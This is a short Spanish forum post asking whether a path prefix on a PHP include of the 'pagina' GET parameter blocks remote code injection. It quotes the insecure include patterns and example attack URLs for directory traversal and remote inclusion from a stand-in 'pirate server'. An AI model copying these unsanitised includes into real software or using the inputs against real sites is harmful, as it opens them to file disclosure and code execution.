Buenas, tras un post que anduvo por aquí hace poco, donde se trataba que hace algo como:

include($_GET['pagina'] . ".php");

eso se demostró que era un peligro, que mejor usar un switch.

Pues un amigo (también programador php) me dijo que lo del switch era una tonteria, que su aplicación era segura.
y lo que hace es:

include("./pages/" . $_GET['pagina'] . ".php");

que cierto que podias intentar incluir algo como
index.php?pagina=../admin/admin
pero que eso lo tiene controlado.

Y que no se peude inyectar codigo de otro servidor, lo que comentaba wrkjmg de poner
index.php?pagina=http://www.servidorpirata.com/script

Es cierto que por sólo incluir los archivos con una ruta:
include("./ruta/" . $_GET['pagina'] . ".php");
ya no se puede inyectar codigo externo?